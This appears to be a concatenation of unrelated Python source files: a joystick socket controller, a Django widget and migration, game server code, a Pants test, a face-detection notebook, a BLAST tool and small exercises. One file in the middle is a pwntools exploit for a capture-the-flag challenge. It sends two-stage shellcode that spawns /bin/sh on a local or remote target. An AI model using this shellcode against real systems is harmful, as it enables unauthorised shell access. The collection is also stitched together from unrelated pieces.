                    self.hat_data[event.hat] = event.value
            # Buttons 6/7 are presumably the L2/R2 triggers -- confirm the
            # mapping for the target controller.
            button_l2 = self.button_data[6]
            button_r2 = self.button_data[7]
            # Both buttons pressed
            if button_l2 and button_r2:
                self.forward = 0
                self.reverse = 0
            elif button_l2:
                # NOTE(review): axis 4 (and 5 below) is absent from
                # axis_data until the first JOYAXISMOTION event fires --
                # potential KeyError; verify on the target hardware.
                mapped_l2_value = int(np.interp(self.axis_data[4], (-1, 1), (0, 100)))
                self.reverse = mapped_l2_value
            elif button_r2:
                mapped_r2_value = int(np.interp(self.axis_data[5], (-1, 1), (0, 100)))
                self.forward = mapped_r2_value
            # Neither button pressed
            elif not button_l2 and not button_r2:
                self.forward = 0
                self.reverse = 0
            # The hat's x-component selects the steering direction.
            direction = self.hat_data[0][0]
            if direction == 1:
                self.left = False
                self.right = True
            elif direction == -1:
                self.left = True
                self.right = False
            else:
                self.left = False
                self.right = False

    def on_message(self, message):
        # Incoming socket traffic is only logged.
        print(message)

    def broadcast(self):
        """Push the current steering/throttle state to the socket at 10 Hz."""
        while True:
            self.clock.tick(10)
            if not self.client.connected:
                continue  # skip a beat while the client reconnects
            # Steering
            if self.left:
                print('STEER: Left')
                self.client.send_command(SOCKET_JOY_DIR_LEFT)
            elif self.right:
                print('STEER: Right')
                self.client.send_command(SOCKET_JOY_DIR_RIGHT)
            else:
                print('STEER: Neutral')
                self.client.send_command(SOCKET_JOY_DIR_NEUTRAL)
            # Speed
            if self.forward > 0:
                print('Forward', self.forward)
                self.client.send_command(SOCKET_JOY_FORWARD, self.forward)
            elif self.reverse > 0:
                print('Reverse', self.reverse)
                self.client.send_command(SOCKET_JOY_BACKWARD, self.reverse)
            else:
                print('Neutral')
                self.client.send_command(SOCKET_JOY_NEUTRAL)
if __name__ == '__main__':
    # Construct the controller bridge and block on the pygame event loop.
    Joystick().listen()
|
from datetime import timedelta
from datetime import datetime
from shared.utils import get_time_of_night
from frontend_manager.py.utils.BaseWidget import BaseWidget
# ------------------------------------------------------------------
class CommentSched(BaseWidget):
    """Schedule-comment widget: initialises client data and refreshes it on
    a 3-second loop.

    NOTE(review): all data-gathering logic is currently commented out, so
    get_data() returns an empty payload.
    """
    # ------------------------------------------------------------------
    #
    # ------------------------------------------------------------------
    def __init__(self, widget_id=None, sm=None, *args, **kwargs):
        # standard common initialisations
        BaseWidget.__init__(
            self,
            widget_id=widget_id,
            sm=sm,
        )

        # # widget-specific initialisations
        # self.block_keys = [['wait'], ['run'], ['done', 'cancel', 'fail']]
        # self.blocks = {}
        # for keys_now in self.block_keys:
        #     self.blocks[keys_now[0]] = []
        # self.time_of_night = {}
        # self.inst_health = []
        # self.tel_ids = self.sm.inst_data.get_inst_ids(
        #     inst_types=['LST', 'MST', 'SST']
        # )
        # # FIXME - need to add lock?
        # if len(self.inst_health) == 0:
        #     for id_now in self.tel_ids:
        #         self.inst_health.append({'id': id_now, 'val': 0})
        return

    # ------------------------------------------------------------------
    async def setup(self, *args):
        """Send the initial dataset and start the per-instance update loop."""
        # standard common initialisations
        # NOTE(review): passes the tuple `args` itself rather than *args --
        # same pattern as back_from_offline; confirm BaseWidget expects this.
        await BaseWidget.setup(self, args)

        # initialise dataset and send to client
        opt_in = {
            'widget': self,
            'event_name': 'init_data',
            'data_func': self.get_data,
        }
        await self.sm.emit_widget_event(opt_in=opt_in)

        # start an update loop for this particular instance (every 3 sec)
        opt_in = {
            'widget': self,
            'loop_scope': 'unique_by_id',
            'data_func': self.get_data,
            'sleep_sec': 3,
            'loop_id': 'update_data_widget_id',
            'event_name': 'update_data',
        }
        await self.sm.add_widget_loop(opt_in=opt_in)
        return

    # ------------------------------------------------------------------
    async def back_from_offline(self, *args):
        """Hook invoked when the client reconnects; delegates to the base."""
        # standard common initialisations
        await BaseWidget.back_from_offline(self, args)
        return

    # ------------------------------------------------------------------
    async def get_data(self):
        """Return the widget payload (currently stubbed to an empty dict)."""
        # self.time_of_night = get_time_of_night(self)
        # time_of_night_date = {
        #     'date_start':
        #     datetime(2018, 9, 16, 21, 30).strftime('%Y-%m-%d %H:%M:%S'),
        #     'date_end': (
        #         datetime(2018, 9, 16, 21, 30)
        #         + timedelta(seconds=int(self.time_of_night['end']))
        #     ).strftime('%Y-%m-%d %H:%M:%S'),
        #     'date_now': (
        #         datetime(2018, 9, 16, 21, 30)
        #         + timedelta(seconds=int(self.time_of_night['now']))
        #     ).strftime('%Y-%m-%d %H:%M:%S'),
        #     'now':
        #     int(self.time_of_night['now']),
        #     'start':
        #     int(self.time_of_night['start']),
        #     'end':
        #     int(self.time_of_night['end'])
        # }
        # self.get_blocks()
        # self.get_tel_health()
        # self.get_events()
        # self.get_clock_events()
        # data = {
        #     'time_of_night': time_of_night_date,
        #     'inst_health': self.inst_health,
        #     'blocks': self.blocks,
        #     'external_events': self.external_events,
        #     'external_clock_events': self.external_clock_events
        # }
        # return data
        return {}

    # # ------------------------------------------------------------------
    # def get_events(self):
    #     pipe = self.redis.get_pipe()
    #     pipe.get(name='external_events')
    #     redis_data = pipe.execute()
    #     self.external_events = redis_data
    #     return

    # def get_clock_events(self):
    #     pipe = self.redis.get_pipe()
    #     pipe.get(name='external_clock_events')
    #     redis_data = pipe.execute()
    #     self.external_clock_events = redis_data
    #     return

    # # ------------------------------------------------------------------
    # def get_tel_health(self):
    #     pipe = self.redis.get_pipe()
    #     for id_now in self.tel_ids:
    #         pipe.h_get(name='inst_health_summary;' + str(id_now), key='health')
    #     redis_data = pipe.execute()
    #     for i in range(len(redis_data)):
    #         id_now = self.tel_ids[i]
    #         self.inst_health[i]['val'] = redis_data[i]
    #     return

    # # ------------------------------------------------------------------
    # def get_blocks(self):
    #     for keys_now in self.block_keys:
    #         pipe = self.redis.get_pipe()
    #         for key in keys_now:
    #             pipe.get('obs_block_ids_' + key)
    #         data = pipe.execute()
    #         obs_block_ids = sum(data, [])  # flatten the list of lists
    #         pipe = self.redis.get_pipe()
    #         for obs_block_id in obs_block_ids:
    #             pipe.get(obs_block_id)
    #         key = keys_now[0]
    #         blocks = pipe.execute()
    #         self.blocks[key] = sorted(
    #             blocks, key=lambda a: float(a['time']['start'])
    #             # cmp=lambda a, b: int(a['time']['start']) - int(b['time']['start'])
    #         )
    #     return
|
from direct.directnotify import DirectNotifyGlobal
from pirates.instance.DistributedInstanceBaseAI import DistributedInstanceBaseAI
from pirates.world.DistributedIslandAI import DistributedIslandAI
class DistributedInstanceWorldAI(DistributedInstanceBaseAI):
    """AI-side world instance that owns and generates island objects."""

    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedInstanceWorldAI')

    def __init__(self, air, fileName=""):
        DistributedInstanceBaseAI.__init__(self, air, fileName)
        self.fileName = fileName
        # Islands generated for this world instance.
        self.activeIslands = set()

    def announceGenerate(self):
        DistributedInstanceBaseAI.announceGenerate(self)

    def generateIslands(self, islandModel, name, uid, isDockable, gameZone):
        """Create a DistributedIslandAI in *gameZone* and configure it.

        NOTE(review): d_setUndockable(undockable=isDockable) forwards the
        dockable flag unchanged -- if 'undockable' is the opposite of
        'dockable', this is inverted; confirm the field's semantics.
        """
        self.island = DistributedIslandAI(self.air, islandModel, name, uid)
        self.island.generateWithRequired(zoneId=gameZone)
        self.island.d_setZoneSphereSize(rad0=1000, rad1=2000, rad2=3000)
        self.island.d_setIslandModel(islandModel=self.island.getIslandModel())
        self.island.d_setUndockable(undockable=isDockable)
        self.activeIslands.add(self.island)
        # self.island is always truthy here -- it was just constructed.
        if self.island:
            self.air.notify.info("Created island: %s" % (name))
def ask_to_continue():
    """Prompt y/n in a loop, dispatching to data entry or the final report.

    NOTE(review): references `self` but is a module-level function, so any
    call raises NameError -- it was probably lifted out of the Dataentry
    class; restore it as a method (or accept the instance as a parameter).
    NOTE(review): the loop has no exit -- answering 'n' prints the report
    and then re-prompts forever; any other input silently re-prompts.
    """
    while True:
        enput = input('\nContinue? [y/n] : ')
        if enput in ("y", "Y"):
            self.enter_sales_figures()
        elif enput in ("n", "N"):
            self.print_dict_with_total()
if __name__ == '__main__':
    print('\n---Sales Reporting---')
    # Dataentry is not defined in this chunk -- presumably defined or
    # imported elsewhere in the original file; verify before running.
    de = Dataentry()
    de.main()
# Read the user's name and greet them.
# input() already returns a str, so the redundant str() wrapper is removed.
n = input("Introduti numele: ")
# Bug fix: the comma-separated print inserted a stray space before '!'.
print("Salut " + n + "!")
# this one is like your scripts with argv
# Bug fix: converted from Python 2 print statements (a SyntaxError under
# Python 3) to the print() function; behavior is otherwise unchanged.
def print_two(*args):
    """Print two positional arguments, unpacked from *args."""
    arg1, arg2 = args
    print("arg1: %r, arg2: %r" % (arg1, arg2))


# Ok, that *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
    """Print two explicitly named arguments."""
    print("arg1: %r, arg2: %r" % (arg1, arg2))


print_two("first", "second")
print_two_again("first", "second")
# Amortization simulator: asks for a debt, a monthly interest rate and a
# fixed monthly payment, then prints the balance month by month.
divida = float(input("Sua divida: "))
taxa = float(input("Taxa de juros: "))
Pagamento = float(input("Pagamento mensal: "))
mes = 1

# First month's interest: if it already exceeds the payment, the balance
# can only grow and the debt is never paid off.
tristeza = divida * (taxa / 100)
if tristeza > Pagamento:
    print("Sua divida não será paga nunca, pois os juros são superiores ao pagamento mensal")
else:
    saldo = divida
    juros_pago = 0
    while saldo > Pagamento:
        juros = saldo * taxa / 100
        # Bug fix: the new balance is the previous *balance* plus interest
        # minus the payment. It previously used the accumulated interest
        # (juros_pago), dropping the principal entirely.
        saldo = saldo + juros - Pagamento
        juros_pago = juros_pago + juros
        print(f"Saldo da divida no mes {mes} é de R${saldo:6.2f}")
        mes = mes + 1
    print(f"Para pagar uma divida de R${divida:8.2f}, a {taxa:5.2f} % de juros, ")
    print(f"você precisará de {mes - 1} meses, pagando um total de R${juros_pago:8.2f} de juros")
    print(f"No ultimo mes, voce teria um saldo residual de R${saldo:8.2f} a pagar")
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import textwrap
from pathlib import Path
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.goals import generate
from pants.backend.go.goals.generate import GoGenerateGoal, OverwriteMergeDigests, _expand_env
from pants.backend.go.target_types import GoModTarget, GoPackageTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
build_pkg_target,
first_party_pkg,
go_mod,
link,
sdk,
tests_analysis,
third_party_pkg,
)
from pants.core.goals.test import get_filtered_environment
from pants.core.util_rules import source_files
from pants.engine.fs import DigestContents, FileContent
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
    """RuleRunner preloaded with the Go rules the `go generate` tests need.

    OverwriteMergeDigests gets a QueryRule so tests can request the merged
    digest contents directly; tmpdirs are preserved to ease debugging.
    """
    rule_runner = RuleRunner(
        rules=[
            *generate.rules(),
            # to avoid rule graph errors?
            *assembly.rules(),
            *build_pkg.rules(),
            *build_pkg_target.rules(),
            *first_party_pkg.rules(),
            *go_mod.rules(),
            *link.rules(),
            *sdk.rules(),
            *target_type_rules.rules(),
            *tests_analysis.rules(),
            *third_party_pkg.rules(),
            *source_files.rules(),
            get_filtered_environment,
            QueryRule(DigestContents, (OverwriteMergeDigests,)),
        ],
        target_types=[GoModTarget, GoPackageTarget],
        preserve_tmpdirs=True,
    )
    rule_runner.set_options([], env_inherit=PYTHON_BOOTSTRAP_ENV)
    return rule_runner
# Adapted from Go toolchain.
# See https://github.com/golang/go/blob/cc1b20e8adf83865a1dbffa259c7a04ef0699b43/src/os/env_test.go#L14-L67
#
# Original copyright:
# // Copyright 2010 The Go Authors. All rights reserved.
# // Use of this source code is governed by a BSD-style
# // license that can be found in the LICENSE file.
# (template, expected expansion) pairs consumed by test_expand_env below.
_EXPAND_TEST_CASES = [
    ("", ""),
    ("$*", "all the args"),
    ("$$", "PID"),
    ("${*}", "all the args"),
    ("$1", "ARGUMENT1"),
    ("${1}", "ARGUMENT1"),
    ("now is the time", "now is the time"),
    ("$HOME", "/usr/gopher"),
    ("$home_1", "/usr/foo"),
    ("${HOME}", "/usr/gopher"),
    ("${H}OME", "(Value of H)OME"),
    ("A$$$#$1$H$home_1*B", "APIDNARGSARGUMENT1(Value of H)/usr/foo*B"),
    ("start$+middle$^end$", "start$+middle$^end$"),
    ("mixed$|bag$$$", "mixed$|bagPID$"),
    ("$", "$"),
    ("$}", "$}"),
    ("${", ""),  # invalid syntax; eat up the characters
    ("${}", ""),  # invalid syntax; eat up the characters
]
@pytest.mark.parametrize("input,output", _EXPAND_TEST_CASES)
def test_expand_env(input, output) -> None:
    """_expand_env substitutes $VAR/${VAR} references from the mapping,
    mirroring the Go toolchain's env-expansion semantics."""
    m = {
        "*": "all the args",
        "#": "NARGS",
        "$": "PID",
        "1": "ARGUMENT1",
        "HOME": "/usr/gopher",
        "H": "(Value of H)",
        "home_1": "/usr/foo",
        "_": "underscore",
    }
    assert _expand_env(input, m) == output
def test_generate_run_commands(rule_runner: RuleRunner) -> None:
    """The generate goal runs //go:generate directives, including a
    `-command` alias and $GOLINE expansion (the directive sits on line 4
    of gen.go, hence the expected "grok-4")."""
    rule_runner.write_files(
        {
            "grok/BUILD": "go_mod(name='mod')\ngo_package()",
            "grok/go.mod": "module example.com/grok\n",
            "grok/gen.go": textwrap.dedent(
                """\
            //go:build generate

            package grok

            //go:generate -command shell /bin/sh -c
            //go:generate shell "echo grok-$GOLINE > generated.txt"
            """
            ),
            "grok/empty.go": "package grok\n",
        }
    )
    result = rule_runner.run_goal_rule(GoGenerateGoal, args=["grok::"], env_inherit={"PATH"})
    assert result.exit_code == 0
    generated_file = Path(rule_runner.build_root, "grok", "generated.txt")
    assert generated_file.read_text() == "grok-4\n"
def test_overwrite_merge_digests(rule_runner: RuleRunner) -> None:
    """Merging keeps files unique to either digest and takes the *new*
    digest's content for paths present in both (dir1/shared.txt)."""
    orig_snapshot = rule_runner.make_snapshot(
        {
            "dir1/orig.txt": "orig",
            "dir1/foo/only-orig.txt": "orig",
            "dir1/shared.txt": "orig",
        }
    )
    new_snapshot = rule_runner.make_snapshot(
        {
            "dir1/new.txt": "new",
            "dir1/bar/only-new.txt": "new",
            "dir1/shared.txt": "new",
        }
    )
    raw_entries = rule_runner.request(
        DigestContents, [OverwriteMergeDigests(orig_snapshot.digest, new_snapshot.digest)]
    )
    # Sort for a deterministic comparison; DigestContents order is not
    # asserted by this test.
    entries = sorted(raw_entries, key=lambda elem: elem.path)
    assert entries == [
        FileContent(
            path="dir1/bar/only-new.txt",
            content=b"new",
        ),
        FileContent(
            path="dir1/foo/only-orig.txt",
            content=b"orig",
        ),
        FileContent(
            path="dir1/new.txt",
            content=b"new",
        ),
        FileContent(
            path="dir1/orig.txt",
            content=b"orig",
        ),
        FileContent(
            path="dir1/shared.txt",
            content=b"new",
        ),
    ]
|
from CallBackOperator import CallBackOperator
from SignalGenerationPackage.DynamicPointsDensitySignal.DynamicPointsDensityUIParameters import DynamicPointsDensityUIParameters
class VerticalOffsetCallBackOperator(CallBackOperator):
    """Keeps the vertical-offset slider and line edit in sync with each
    other and with the model's VerticalOffset value."""

    def __init__(self, model):
        super().__init__(model)

    # overridden
    def ConnectCallBack(self, window):
        """Wire the slider/line-edit pair using the limits and accuracy
        declared in DynamicPointsDensityUIParameters."""
        self.window = window
        self.setup_callback_and_synchronize_slider(
            validator_min=DynamicPointsDensityUIParameters.VerticalOffsetSliderMin,
            validator_max=DynamicPointsDensityUIParameters.VerticalOffsetSliderMax,
            validator_accuracy=DynamicPointsDensityUIParameters.VerticalOffsetLineEditAccuracy,
            line_edit=window.VerticalOffsetlineEdit,
            slider_min=DynamicPointsDensityUIParameters.VerticalOffsetSliderMin,
            slider_max=DynamicPointsDensityUIParameters.VerticalOffsetSliderMax,
            slider=window.VerticalOffsethorizontalSlider,
            update_slider_func=self.update_vertical_offset_slider,
            update_line_edit_func=self.update_vertical_offset_line_edit
        )

    def update_vertical_offset_slider(self):
        # Line edit changed -> move the slider to match.
        self.update_slider(
            line_edit=self.window.VerticalOffsetlineEdit,
            slider=self.window.VerticalOffsethorizontalSlider,
            calc_constant=DynamicPointsDensityUIParameters.VerticalOffsetCalcConstant
        )

    def update_vertical_offset_line_edit(self):
        # Slider changed -> update the line edit and push into the model.
        self.update_line_edit(
            line_edit=self.window.VerticalOffsetlineEdit,
            slider=self.window.VerticalOffsethorizontalSlider,
            calc_constant=DynamicPointsDensityUIParameters.VerticalOffsetCalcConstant,
            update_model_func=self.update_vertical_offset
        )

    def update_vertical_offset(self, val):
        # Final sink: store the new offset on the model.
        self.model.VerticalOffset = val
from pwn import *
import time
import sys
def exploit():
    """Two-stage shellcode delivery to the target process `proc`.

    NOTE(review): written for Python 2 (raw_input); the 'wait' prompts are
    pauses so a debugger can be attached before each stage is sent.
    """
    raw_input('wait')
    seen = [0 for i in range(257)]
    # Stage 1: 8-byte stub ending in 0x0f 0x05 (syscall).
    shellcode = '\x5a\x55\x5e\x5f\x5f\x58\x0f\x05'
    # Prints 0x0 -- `seen` is all zeroes; presumably a leftover debug aid.
    print(hex(seen[256]))
    proc.sendline(shellcode)
    # Stage 2: NOP sled followed by shellcode embedding "/bin//sh".
    shellcode = '\x90' * 8
    shellcode += '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53'
    shellcode += '\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
    raw_input('wait')
    proc.sendline(shellcode)
if __name__ == '__main__':
    context.arch = 'amd64'
    # Default remote endpoint, split into ['nc', host, port].
    connect = 'nc shellcodeme.420blaze.in 420'
    connect = connect.split(' ')
    # Any extra CLI argument selects the remote target; otherwise run the
    # local binary with the bundled libraries.
    if len(sys.argv) > 1:
        proc = remote(connect[1], int(connect[2]))
    else:
        proc = process(['./shellcodeme'], env={'LD_LIBRARY_PATH': './'})
    exploit()
    proc.interactive()
|
from script.ji_yun_ying_pc.data_config import data_config
import jsonpath
from script.base_api.service_user.auth import auth_employee_post
from script.base_api.service_user.employees import *
from script.base_api.service_user.token import token_valid_get
import allure
import pytest
@allure.feature("不同账号的登录测试")
@allure.testcase("http://132.232.109.76/zentao/testcase-view-24250-1.html")
class TestLogin:
    """Logs in with each parametrized account and walks the basic
    authenticated flow: profile, accessible modules, token validity."""

    # Shared across parametrized runs; Authorization is added after login.
    header = {"Content-Type": "application/json;charset=UTF-8"}

    @allure.story("测试登录")
    @pytest.mark.parametrize("body_data", data_config.login_data)
    def test_login(self, body_data):
        """Login -> fetch profile -> fetch accessible modules -> validate token."""
        # Log in with the parametrized credentials.
        res_json = auth_employee_post(body=body_data, header=TestLogin.header)
        tokens = jsonpath.jsonpath(res_json, "$.data.token")
        # Fall back to a placeholder when the response carried no token.
        if tokens:
            token = tokens[0]
        else:
            token = "not found"
        TestLogin.header["Authorization"] = "Bearer " + token

        # Fetch the logged-in employee's profile.
        params = {"token": token}
        res_json = employees_info_get(params=params, header=TestLogin.header)
        employee_ids = jsonpath.jsonpath(res_json, "$..employeeId")
        employee_id = employee_ids[0] if employee_ids else "not found"
        # employee_names = jsonpath.jsonpath(res_json, "$..employeeName")
        # employee_name = employee_names[0] if employee_names else "not found"

        # Fetch the modules this employee may access.
        employees_employeeId_access_modules_get(employee_id, header=TestLogin.header)
        # Check whether the token is still valid.
        token_valid_get(header=TestLogin.header)
|
#!/usr/bin/env python
# coding: utf-8
# # Face Detection using OpenCV
# 
# ## 1- Introduction:
# In this task I used OpenCV to detect human faces in images in Python.
# ## 2- OpenCV:
# It is an open source computer vision library; OpenCV provides pre-trained models. <br>
# ## 3- Detect Human Faces in an image using OpenCV:
# I used pretrained Haar cascade models to detect faces and eyes in an image, we need to download the trained classifier XML file (haarcascade_frontalface_alt.xml)and (haarcascade_eye_tree_eyeglasses.xml), which is available in OpenCv’s GitHub repository (https://github.com/opencv/opencv/tree/master/data/haarcascades).and save it to your working location.
# ### <li> Libraries:</li>
# 1- <b>cv2 Library:</b> OpenCV library.<br>
# 2- <b>Numpy Library:</b> to search for the row and column values of the face NumPy ndarray. This is the array with the face rectangle coordinates.<br>
# 3- <b>glob Library:</b> is used to retrieve files/pathnames matching a specified pattern.<br>
# 4- <b>matplotlib Library:</b> to draw rectangle an circular around faces and eyes that detect in the image.<br>
#
# ### <li>Steps:</li>
# 1- Import all necessary libraries.<br>
# 2- Load filenames for human images. <br>
# 3- Extract pre-trained face and eye detectors. <br>
# 4- Convert the color images to grayscale; this is an important step because detection works only on grayscale images.<br>
# 5- Find faces and eyes in image using detectMultiScale function.
# 6- Get bounding box for each detected face and eye: Each face contains a set of coordinate for the rectangle regions where faces were found. We use these coordinates to draw the rectangles in our image.
#
# In[78]:

# importing necessary libraries.
import cv2
import numpy as np
from glob import glob
import matplotlib.pyplot as plt
# NOTE: get_ipython() only exists inside IPython/Jupyter; running this with
# a plain Python interpreter will fail on this line.
get_ipython().run_line_magic('matplotlib', 'inline')

# load filenames for human images
human_files = np.array(glob("human_images/*"))

# extract pre-trained face and eye detectors (the XML cascade files must
# sit next to this script; see OpenCV's haarcascades repository)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye_tree_eyeglasses.xml')

# load color (BGR) image
for image in human_files:
    img = cv2.imread(image)
    # convert BGR image to grayscale -- the Haar detectors operate on
    # single-channel images
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

    # find faces and eyes in image
    faces = face_cascade.detectMultiScale(gray)
    eyes = eye_cascade.detectMultiScale(gray)

    # print number of faces and eyes detected in the image
    print('Number of faces detected:', len(faces))
    print('Number of eyes detected:', len(eyes))

    # get bounding box for each detected face and eye
    for (x,y,w,h) in faces:
        # add bounding box to color image
        cv2.rectangle(img,(x,y),(x+w,y+h),(191,40,78),2)
    for (x2,y2,w2,h2) in eyes:
        # circle centred on the eye; radius is half the mean of w2 and h2
        radius = int(round((w2 + h2)*0.25))
        cv2.circle(img,(x2+w2//2,y2+h2//2),radius, (216,91,255), 2)

    # convert BGR image to RGB for plotting
    cv_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)

    # display the image, along with bounding box
    plt.imshow(cv_rgb)
    plt.show()
# ## 4- Refrences:
# 1- How to set up your computer to work with the OpenCV library: https://docs.opencv.org/master/df/d65/tutorial_table_of_content_introduction.html<br>
# 2- Face Detection in 2 Minutes using OpenCV & Python: https://towardsdatascience.com/face-detection-in-2-minutes-using-opencv-python-90f89d7c0f81 <br>
# 3- Cascade Classifier: https://docs.opencv.org/master/db/d28/tutorial_cascade_classifier.html<br>
|
#!/usr/bin/python3
# -*-coding:utf-8 -*
from mdBlast import *
from time import time, gmtime, strftime
from datetime import datetime
import sys
import argparse
tps1 = time()  # wall-clock start, used for the final runtime report

############################################################################
#                                                                          #
#                          PARAMETER HANDLING                              #
#                                                                          #
############################################################################

# Parameter dictionary (default values)
parametres = {
    "requete": None,                          # query sequence (fasta), required
    "bdd": "../data/testBDD.fasta",           # database (fasta or "saved")
    "matrice": "../data/blosum62.txt",        # scoring matrix
    "version": 1,                             # BLAST version (2 not functional)
    "w": 3,                                   # word size
    "seuilScore": 0,                          # minimum HSP score
    "seuilEvalue": 10,                        # e-value threshold
    "nbHSP": 250,                             # max HSPs reported
    "out": "../resultats/results_blast.txt"}  # output file

'''
Parameter handling:
8 parameters:
    -h: help
    -r: path to the query sequence in fasta format.
    -b: path to the database, in fasta or "saved" format
        (previously built by a first run from a fasta file).
        (By default, the bundled pre-built hash table is used.)
    -m: path to the scoring matrix (default: bundled blosum62).
    -v: BLAST version (1 or 2). (2 not functional)
    -w: word size (default 3).
    -s: minimum score of reported HSPs (default 0).
    -e: e-value threshold (default 10).
    -n: number of HSPs reported (default 250).
    -o: output file.
'''

# Reject obviously malformed command lines before argparse runs
# (at most 9 options x ~2 tokens each).
if(len(sys.argv) > 16):
    sys.exit("erreur: trop de parametres (voir aide -h)")

parser = argparse.ArgumentParser()
parser.add_argument("-r", help="Chemin vers la séquence requête au format fasta.")
parser.add_argument("-b", help="Chemin vers la BDD au format fasta. \n(précédement construite par une premiere utilisattion avec un fichier fasta)\n(Par défaut, utilisation de la table de hachage pré-construite fournie)")
parser.add_argument("-m", help="Chemin vers la matrice de score. (par défaut, matrice blosum62 fournie.")
parser.add_argument("-v", type=int, help="Version de Blast (1 ou 2). (2 non fonctionelle)")
parser.add_argument("-w", type=int, help="Taille des mots. (Par défaut, 3)")
parser.add_argument("-s", type=int, help="Score minimal des HSP en sortie. (Par défaut, 0)")
parser.add_argument("-e", type=float, help="Seuil de e-value. (Par défaut, 10)")
parser.add_argument("-n", type=int, help="Nombre de HSP en sortie. (Par défaut, 250)")
parser.add_argument("-o", help="Fichier de sortie")

args = parser.parse_args()
parametres = verifParametres(args, parametres)
############################################################################
#                                                                          #
#                             MAIN PROGRAM                                 #
#                                                                          #
############################################################################

# Import the query sequence ------------------------------------------------
print("Importation séquence requête... ")
seqReq = importSeqFasta(parametres["requete"])
# seqReq => (id, sequence)
print("OK\n")

# Import the scoring matrix ------------------------------------------------
print("Importation de la matrice de scores... ")
blosum62 = MatScore(parametres["matrice"])
print("OK\n")

# Build the hash table of W-letter words for the query sequence ------------
if parametres["w"] > len(seqReq[1])/2:
    sys.exit("erreur: Taille des mots trop grande.")
print("Construction du dictionaire de mots similaires pour la séquence requête... ")
dicoWRequete = dicoMots(seqReq[1], parametres["w"], blosum62)
print("OK\n")

# Import the database ------------------------------------------------------
# When the database is provided as fasta it is re-saved in "saved" format
# so later runs can load it faster.
print("Importation de la base de donnée... ")
if(parametres["bdd"].split('.')[-1] == "fasta"):
    bdd = BDD(parametres["bdd"])
    print("OK\n")
    # Save the database to disk in "saved" format.
    print("Sauvegarde de la base de donnée... ")
    res = dumpBDDSaved(parametres["bdd"], bdd)
    print('OK ('+res+')\n')
else:
    bdd = loadBDDSaved(parametres["bdd"])
    print("OK\n")
# Hit search and extension -------------------------------------------------
print("BLAST en cours... \n")
# HSP ids are kept sorted by increasing score as they are produced.
lScoreCroissant = []
dicoHSP = {}
for motReq in dicoWRequete:
    for posMotReq in dicoWRequete[motReq]:
        if motReq in bdd.dico_3wBDD.keys():
            for infoMotBDD in bdd.dico_3wBDD[motReq]:
                # infoMotBDD => (idSequenceBDD, position)
                # A hit that already falls inside an existing HSP is
                # skipped -- an approximation that saves compute time.
                if(not (infoMotBDD[0] in dicoHSP and (dicoHSP[infoMotBDD[0]].q_start <= infoMotBDD[1] <= dicoHSP[infoMotBDD[0]].q_end) and (dicoHSP[infoMotBDD[0]].r_start <= posMotReq <= dicoHSP[infoMotBDD[0]].r_end))):
                    # Hit extension ----------------------------------------------
                    hsp_tmp = HSP(motReq, posMotReq, infoMotBDD)
                    hsp_tmp.extension(seqReq[1], bdd.dico_seqBDD[infoMotBDD[0]], blosum62)
                    hsp_tmp.e_value(bdd.sizeBDD)
                    # HSP selection ----------------------------------------------
                    # Drop HSPs whose score is too low or e-value too high.
                    if(hsp_tmp.score_tot < parametres["seuilScore"] or hsp_tmp.eval > parametres["seuilEvalue"]):
                        continue
                    # Keep only the best-scoring HSP per database sequence.
                    if((hsp_tmp.hit.infoMotBDD[0] not in dicoHSP) or (hsp_tmp.hit.infoMotBDD[0] in dicoHSP and hsp_tmp.score_tot > dicoHSP[hsp_tmp.hit.infoMotBDD[0]].score_tot)):
                        hsp_tmp.pourcentageID_SIM(seqReq[1], bdd.dico_seqBDD[infoMotBDD[0]], blosum62)
                        dicoHSP[hsp_tmp.hit.infoMotBDD[0]] = hsp_tmp
                        # Re-insert the sequence id at its sorted position.
                        if(hsp_tmp.hit.infoMotBDD[0] in lScoreCroissant):
                            lScoreCroissant.remove(hsp_tmp.hit.infoMotBDD[0])
                        i = 0
                        for i, hsp in enumerate(lScoreCroissant):
                            if(dicoHSP[hsp].score_tot > hsp_tmp.score_tot):
                                break
                        lScoreCroissant.insert(i, hsp_tmp.hit.infoMotBDD[0])

# Output writing -----------------------------------------------------------
# Best scores first; cap the report at nbHSP entries.
lScoreCroissant.reverse()
i = 0
with open(parametres["out"], "w") as fOut:
    while i < min(parametres["nbHSP"], len(lScoreCroissant)):
        fOut.write("### HSP "+str(i+1)+" ###\n")
        fOut.write(dicoHSP[lScoreCroissant[i]].ecriture(seqReq, bdd.dico_seqBDD[dicoHSP[lScoreCroissant[i]].hit.infoMotBDD[0]]))
        i += 1
print("Nombre de HSP: "+str(len(lScoreCroissant)))
print("\nDurée d'exécution : ")
print(strftime('%H:%M:%S', gmtime(time()-tps1)))
|
# Generated by Django 2.2.4 on 2019-09-17 22:19
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration (2.2.4).

    Adds the ``Lot.is_lock`` boolean flag and updates the meta options of
    ``ResidentLotThroughModel`` (ordering + admin verbose names).
    """

    # Must be applied after the app's initial migration.
    dependencies = [
        ('residents', '0001_initial'),
    ]

    operations = [
        # Order rows by the explicit 'order' field; show as "Resident(s)" in admin.
        migrations.AlterModelOptions(
            name='residentlotthroughmodel',
            options={'ordering': ('order',), 'verbose_name': 'Resident', 'verbose_name_plural': 'Residents'},
        ),
        # New flag marking a property as locked; existing rows default to unlocked.
        migrations.AddField(
            model_name='lot',
            name='is_lock',
            field=models.BooleanField(default=False, verbose_name='Lock Property'),
        ),
    ]
|
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
